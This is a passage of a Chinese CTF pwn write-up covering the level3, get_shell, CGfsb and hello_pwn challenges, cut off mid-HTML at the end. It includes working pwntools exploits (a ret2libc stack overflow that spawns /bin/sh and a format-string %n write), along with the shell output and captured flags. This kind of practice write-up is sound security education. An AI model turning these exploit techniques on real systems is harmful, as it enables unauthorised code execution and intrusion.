src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018244.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218212541039\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">[*] &#039;\/home\/kali\/Desktop\/level3&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\n[*] &#039;\/home\/kali\/Desktop\/libc_32.so.6&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/code><\/pre>\n<p>\u7528IDA\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b string\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018245.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018245.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218222726696\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u518d\u67e5\u770b\u4e00\u4e0b\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">#level3\u7684main\u51fd\u6570\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  vulnerable_function();\n  write(1, &quot;Hello, World!\\n&quot;, 0xEu);\n  return 0;\n}<\/code><\/pre>\n<pre><code class=\"language-c\">#vulnerable_function()\u51fd\u6570\nssize_t vulnerable_function()\n{\n  char buf; \/\/ [esp+0h] [ebp-88h]\n\n  write(1, &quot;Input:\\n&quot;, 7u);\n  return read(0, &amp;buf, 0x100u);\n}<\/code><\/pre>\n<p>\u8fd9\u9898\u6211\u53ea\u770b\u51fa<code>buf<\/code>\u5728<code>read\u51fd\u6570<\/code>\u4e2d\u8fdb\u884c\u4e86\u8c03\u7528\u3002\u53ef\u4ee5\u8fdb\u884c\u6ea2\u51fa\u3002\u5269\u4e0b\u7684\u53c2\u8003\u7684\u662f\u4e24\u4f4d\u5e08\u5085\u5199\u7684wp:<\/p>\n<blockquote>\n<p><code>\u653b\u51fb\u601d\u8def\uff1a libc\u4e2d\u7684\u51fd\u6570\u7684\u76f8\u5bf9\u5730\u5740\u662f\u56fa\u5b9a\u7684\uff0c\u8981\u60f3\u83b7\u53d6\u5230system\u51fd\u6570\u7684\u5730\u5740\uff0c\u53ef\u4ee5\u901a\u8fc7write()\u51fd\u6570\u8fdb\u884coffset\u8ba1\u7b97\u3002<\/code><\/p>\n<p><code>1. \u9996\u5148\u5229\u7528write()\u51fd\u6570\u8ba1\u7b97\u51fawrite()\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff1b<\/code><\/p>\n<p><code>2. \u5229\u7528\u76f8\u5bf9offset\u8ba1\u7b97\u51fasystem\u548c&quot;\/bin\/sh&quot;\u7684\u771f\u5b9e\u5730\u5740\u3002<\/code><br \/>\n\u5728vulnerable_function()\u4e2d\uff0c\u5148\u8c03\u7528\u4e86write()\u51fd\u6570\uff0c\u7136\u540e\u8c03\u7528read()\u51fd\u6570\u3002write()\u51fd\u6570\u8fd4\u56de\u5230vulnerable_function()\u540e\uff0c\u518d\u8fdb\u884cread()\u51fd\u6570\u8c03\u7528\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u8fdb\u884c\u4e8c\u6b21\u653b\u51fb\u3002<\/p>\n<ul>\n<li>\u7b2c\u4e00\u6b21\u653b\u51fb\u6211\u4eec\u5229\u7528\u6808\u6ea2\u51fa\u5c06write()\u51fd\u6570\u5728got\u8868\u4e2d\u7684\u771f\u5b9e\u5730\u5740leak\u51fa\u6765\uff0c\u7136\u540e\u51cf\u53bblibc\u4e2d\u7684offset\uff0c\u5c31\u53ef\u4ee5\u5f97\u5230libc\u7684base address\u3002<\/li>\n<li>\u7b2c\u4e8c\u6b21\u653b\u51fb\u91cd\u65b0\u8fdb\u5165main\u51fd\u6570\uff0c\u518d\u6b21\u901a\u8fc7\u6808\u6ea2\u51fa\uff0c\u5229\u7528system\u51fd\u6570\u8fdb\u884cgetshell\u3002`                                                                                                                                                                                                                              \u2014\u2014<a href=\"https:\/\/blog.csdn.net\/elsa________\">elsa<strong>____<\/strong><\/a><\/li>\n<\/ul>\n<p><code>\u8fd9\u91cc\u901a\u8fc7\u7a0b\u5e8f\u52a0\u8f7d\u7684libc\u91cc\u9762\u5e93\u51fd\u6570system\u548c\/bin\/sh\u5b57\u7b26\u4e32\u6765\u8fbe\u5230\u6211\u4eec\u7684\u76ee\u7684\uff0c\u7a0b\u5e8f\u5f00\u59cb\u8fd0\u884c\u7684\u65f6\u5019\uff0c\u4f1a\u628a\u6574\u4e2alibc\u6620\u5c04\u5230\u5185\u5b58\u7a7a\u95f4\uff0c\u540e\u9762\u7a0b\u5e8f\u8c03\u7528\u76f8\u5173\u5e93\u51fd\u6570\u7684\u65f6\u5019\uff0c\u4f1a\u4f9d\u7167plt-got\u8868\u7684\u673a\u5236\uff0c\u5c06\u6240\u9700\u7684\u5e93\u51fd\u6570\u52a0\u8f7d\u5230\u5185\u5b58\u7a7a\u95f4\u7684\u67d0\u4e2a\u865a\u62df\u5185\u5b58\u5730\u5740\uff0c\u7136\u540e\u8c03\u7528\u5c31\u4f1a\u901a\u8fc7plt-got\u8868\u8df3\u8f6c\u5230\u771f\u6b63\u7684\u51fd\u6570\u5185\u5b58\u5730\u5740\u5904\u5b8c\u6210\u529f\u80fd\u3002\u901a\u8fc7write\u51fd\u6570\u6cc4\u9732write\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0c\u7136\u540e\u901a\u8fc7write\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u8ba1\u7b97\u51fasystem\u51fd\u6570\u548c&quot;\/bin\/sh&quot;\u7684\u771f\u5b9e\u5730\u5740\uff0c\u7136\u540e\u8df3\u8f6c\u8fc7\u53bb\u6267\u884c\u3002\u8fd9\u5c31\u9700\u8981\u4e24\u6b21\u6ea2\u51fa\u3002<\/code><\/p>\n<p>\u200b                                                                                                                                                                                      \u2014\u2014endust<\/p>\n<\/blockquote>\n<p>\u6700\u540e\u5c31\u662f\u5199exp\uff0c\u672c\u9898exp\u7528\u7684\u662f<a href=\"https:\/\/blog.csdn.net\/elsa________\">elsa<strong>____<\/strong><\/a>\u5e08\u5085\u7684\uff1a<\/p>\n<pre><code class=\"language-python\">from pwn import *\nsh = remote(&quot;111.200.241.244&quot;,&quot;52403&quot;)\n#sh=process(&#039;.\/level3&#039;)\n#context.log_level = &#039;debug&#039;\nelf=ELF(&#039;.\/level3&#039;)\nlibc=ELF(&#039;.\/libc_32.so.6&#039;)\n#get func address\nwrite_plt = elf.plt[&#039;write&#039;]\nwrite_got = elf.got[&#039;write&#039;]\nmain_addr = elf.symbols[&#039;main&#039;]\npayload = b&#039;A&#039;*0x88 + p32(0xdeadbeef) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(0xdeadbeef)\nsh.sendlineafter(&quot;Input:\\n&quot;,payload)\n#leak write&#039;s addr in got\nwrite_got_addr = u32(sh.recv()[:4])\n#leak libc&#039;s addr\nlibc_addr = write_got_addr - libc.symbols[&#039;write&#039;]\n#get system&#039;s addr\nsys_addr = libc_addr + libc.symbols[&#039;system&#039;]\n#get bin\/sh &#039;s addr    strings -a -t x libc_32.so.6 | grep &quot;\/bin\/sh&quot;\n#libc.search(&quot;\/bin\/sh&quot;).next()\nbin_sh_addr = libc_addr + 0x15902b\n#get second payload\npayload0 = b&#039;A&#039;*0x88 + p32(0xdeadbeef) + p32(sys_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)\nsh.sendline(payload0)\nsh.interactive()<\/code><\/pre>\n<p>\u8fd0\u884c\u5373\u53ef\u5f97\u5230flag:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018246.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018246.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218222302115\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>==PS\uff1a\u8fd9\u91cc\u53ef\u80fd\u4f1a\u6709\u62a5\u9519\uff1a==<\/p>\n<blockquote><p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018247.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018247.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218224255709\" style=\"zoom: 50%;\" \/><\/div>\n<\/p><\/blockquote>\n<p>==\u89e3\u51b3\u529e\u6cd5\uff1a==<\/p>\n<blockquote>\n<p>\u5728<code>&#039;A&#039;<\/code>\u53ca\u5176\u4ed6\u5b57\u6bcd\u524d\u9762\u52a0\u4e0ab\uff0c\u56e0\u4e3apayload\u5728\u53d1\u9001\u5b57\u7b26\u524d\u9700\u8981\u52a0\u4e0a\u4e00\u4e2ab\u3002<\/p>\n<\/blockquote>\n<h2>get_shell<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018248.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018248.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218150828449\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff<code>64\u4f4dIDA<\/code>\u6253\u5f00\uff0c\u89c2\u5bdfmain\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  puts(&quot;OK,this time we will get a shell.&quot;);\n  system(&quot;\/bin\/sh&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u8fd0\u884c\u5c31\u80fd\u62ff\u5230shell\uff1a<\/p>\n<pre><code class=\"language-python\">#exp.py\nfrom pwn import *   #\u5bfc\u5165 pwntools \u4e2d pwn \u5305\u7684\u6240\u6709\u5185\u5bb9\nr = remote(&quot;111.200.241.244&quot;,&quot;56877&quot;)  # \u94fe\u63a5\u670d\u52a1\u5668\u8fdc\u7a0b\u4ea4\u4e92\nr.sendline()  # \u5c06shellcode \u53d1\u9001\u5230\u8fdc\u7a0b\u8fde\u63a5\nr.interactive()  # \u5c06\u63a7\u5236\u6743\u4ea4\u7ed9\u7528\u6237\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\u6253\u5f00\u7684shell\u4e86<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python exp.py          \n[+] Opening connection to 111.200.241.244 on port 56877: Done\n[*] Switching to interactive mode\n$ cat flag\ncyberpeace{27c56f65c3888d1dfd6d8293db7966ab}<\/code><\/pre>\n<h2>CGfsb<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018249.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018249.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218154911015\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5148\u67e5\u770b\u4e00\u4e0b\u9644\u4ef6\u7684\u57fa\u672c\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec CGfsb\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/CGfsb&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ file CGfsb \nCGfsb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=113a10b953bc39c6e182c4ce6e05582ba2f8017a, not stripped                                                         \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ checksec --file=e41a0f684d0e497f87bb309f91737e4d \nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH   Symbols         FORTIFY Fortified       Fortifiable     FILE\nPartial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   77) Symbols    No    0               3               e41a0f684d0e497f87bb309f91737e4d\n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ .\/CGfsb            \nzsh: permission denied: .\/CGfsb                                                                            \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ chmod -R 777 CGfsb                                                                               \n\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ .\/CGfsb           \nplease tell me your name:\naaa\nleave your message please:\naaa\nhello aaa\nyour message is:\naaa\nThank you!<\/code><\/pre>\n<p>\u8fd9\u91cc\u6ce8\u610f ubuntu \u548c kali \u4f7f\u7528\u7684 checksec \u7248\u672c\u4e0d\u4e00\u6837\uff0c\u4f7f\u7528\u65b9\u6cd5\u4e5f\u4e0d\u4e00\u6837\uff0c\u8be6\u60c5\u53ef\u4ee5\u53c2\u8003<a href=\"https:\/\/github.com\/slimm609\/checksec.sh\">\u5b98\u65b9\u6587\u6863<\/a><\/p>\n<p>\u6253\u5f00IDA\uff0c\u67e5\u770bmain\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int buf; \/\/ [esp+1Eh] [ebp-7Eh]\n  int v5; \/\/ [esp+22h] [ebp-7Ah]\n  __int16 v6; \/\/ [esp+26h] [ebp-76h]\n  char s; \/\/ [esp+28h] [ebp-74h]\n  unsigned int v8; \/\/ [esp+8Ch] [ebp-10h]\n\n  v8 = __readgsdword(0x14u);\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  buf = 0;\n  v5 = 0;\n  v6 = 0;\n  memset(&amp;s, 0, 0x64u);\n  puts(&quot;please tell me your name:&quot;);\n  read(0, &amp;buf, 0xAu);\n  puts(&quot;leave your message please:&quot;);\n  fgets(&amp;s, 100, stdin);\n  printf(&quot;hello %s&quot;, &amp;buf);\n  puts(&quot;your message is:&quot;);\n  printf(&amp;s);\n  if ( pwnme == 8 )\n  {\n    puts(&quot;you pwned me, here is your flag:\\n&quot;);\n    system(&quot;cat flag&quot;);\n  }\n  else\n  {\n    puts(&quot;Thank you!&quot;);\n  }\n  return 0;\n}<\/code><\/pre>\n<p>\u5206\u6790\u4ee3\u7801\uff0c\u5f88\u660e\u663e\u8981\u8ba9pwnme\u7684\u503c\u53d8\u4e3a8\uff0c\u5f80\u4e0a\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n<pre><code class=\"language-c\">printf\uff08&amp;s\uff09;<\/code><\/pre>\n<p>\u8fd9\u4e2a\u5f62\u5f0f\u7684printf\u4e5f\u662f\u53ef\u4ee5\u5b9e\u73b0\u7684\uff0c\u4f46\u662f\u4e0d\u5b89\u5168\uff0c\u4f1a\u6709\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3002<\/p>\n<blockquote>\n<p><code>\u9700\u8981\u6ce8\u610f\u7684\u662f**%n**\u8fd9\u4e2a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0c\u5b83\u7684\u529f\u80fd\u662f\u5c06%n\u4e4b\u524d\u6253\u5370\u51fa\u6765\u7684\u5b57\u7b26\u4e2a\u6570\uff0c\u8d4b\u503c\u7ed9\u4e00\u4e2a\u53d8\u91cf<\/code><\/p>\n<pre><code class=\"language-c\">printf(\"Hello World%n\", &a);\n\/\/a = 11\nprintf(\"AAAA%2$n\", &argu1, &argu2, &argu3......);\n\/\/\u4f7f\u7528'$'\u7b26\u53f7\u6765\u8fdb\u884c\u53c2\u6570\u7684\u9009\u62e9,\u4ee3\u8868\u7684\u662f\u5c06\u6253\u5370\u5b57\u7b26\u7684\u4e2a\u6570\u5199\u5165\u53c2\u65702\u5bf9\u5e94\u7684\u5730\u5740\u5185\u5b58\u4e2d.<\/code><\/pre>\n<\/blockquote>\n<p>\u53ef\u4ee5\u60f3\u5230\uff0c\u628a<code>pwnme<\/code>\u653e\u5230<code>message<\/code>\uff0c\u52a0\u4e00\u4e2a<code>%n<\/code>\uff0c\u4f7f\u5176\u4e0e\u8f93\u5165\u5730\u5740\u5bf9\u5e94\u4ece\u800c\u5229\u7528\u6f0f\u6d1e\u3002<\/p>\n<p>\u540c\u65f6\u70b9\u51fbpwnme\u627e\u5230\u5730\u5740\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018250.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018250.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218171508180\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u4eec\u5f97\u67e5\u4e00\u4e0b\u6211\u4eec\u8f93\u5165\u8fdb\u53bb\u7684\u6570\u636e\u5728\u6808\u4e2d\u504f\u79fb\u4e86\u591a\u5c11\uff0c\u77e5\u9053\u504f\u79fb\u91cf\u540e\u6211\u4eec\u624d\u80fd\u5c06\u5176\u5bf9\u5e94\u8d77\u6765\uff0c\u5411message\u91cc\u8f93\u5165\uff1a<\/p>\n<pre><code class=\"language-c\">AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p<\/code><\/pre>\n<blockquote>\n<p><code>%d - \u5341\u8fdb\u5236 - \u8f93\u51fa\u5341\u8fdb\u5236\u6574\u6570 %s - \u5b57\u7b26\u4e32 - \u4ece\u5185\u5b58\u4e2d\u8bfb\u53d6\u5b57\u7b26\u4e32 %x - \u5341\u516d\u8fdb\u5236 - \u8f93\u51fa\u5341\u516d\u8fdb\u5236\u6570 %c - \u5b57\u7b26 - \u8f93\u51fa\u5b57\u7b26 %p - \u6307\u9488 - \u6307\u9488\u5730\u5740 %n - \u5230\u76ee\u524d\u4e3a\u6b62\u6240\u5199\u7684\u5b57\u7b26\u6570<\/code><\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018251.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018251.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218172248219\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd9\u91cc\u7684<code>0x41414141<\/code>\u5c31\u662f<code>AAAA<\/code>\uff0c\u53ef\u4ee5\u77e5\u9053\u504f\u79fb\u91cf\u4e3a10\uff0c\u5199\u4e00\u4e2aexp.py:<\/p>\n<pre><code class=\"language-python\">#exp.py\nfrom pwn import *\nsh = remote(&#039;111.200.241.244&#039;,55428)\nsh.recv()\nsh.sendline(&#039;aaa&#039;)\nsh.recv()\npayload = p32(0x804a068).decode(&#039;unicode_escape&#039;) +&#039;aaaa&#039; +&#039;%10$n&#039;\nsh.sendline(payload)\nsh.interactive()<\/code><\/pre>\n<p>\u987a\u5229\u5f97\u5230flag\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ python exp.py          \n[+] Opening connection to 111.200.241.244 on port 55428: Done\n\/home\/kali\/Desktop\/exp.py:5: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  sh.sendline(&#039;aaa&#039;)\n\/home\/kali\/Desktop\/exp.py:8: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  sh.sendline(payload)\n[*] Switching to interactive mode\nleave your message please:\nhello aaa\nyour message is:\nh\\xa0\\x04aaaa\nyou pwned me, here is your flag:\n\ncyberpeace{6bcb8a8d21137c4daa3263d1953b7d00}\n[*] Got EOF while reading in interactive\n$  <\/code><\/pre>\n<h2>hello_pwn<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018252.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018252.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218172720643\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec hello_pwn\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/hello_pwn&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\nPwn@ubuntu:~\/\u684c\u9762$ file hello_pwn \nhello_pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 2.6.32, BuildID[sha1]=05ef7ecf06e02e7f199b11c4647880e8379e6ce0, stripped\nPwn@ubuntu:~\/\u684c\u9762$ .\/hello_pwn\n~~ welcome to ctf ~~     \nlets get helloworld for bof\naaa<\/code><\/pre>\n<p>\u6253\u5f00IDA\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/main\u51fd\u6570\n__int64 __fastcall main(__int64 a1, char **a2, char **a3)\n{\n  alarm(0x3Cu);\n  setbuf(stdout, 0LL);\n  puts(&quot;~~ welcome to ctf ~~     &quot;);\n  puts(&quot;lets get helloworld for bof&quot;);\n  read(0, &amp;unk_601068, 0x10uLL);\n  if ( dword_60106C == 1853186401 )\n    sub_400686(0LL, &amp;unk_601068);\n  return 0LL;\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018253.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018253.png\" 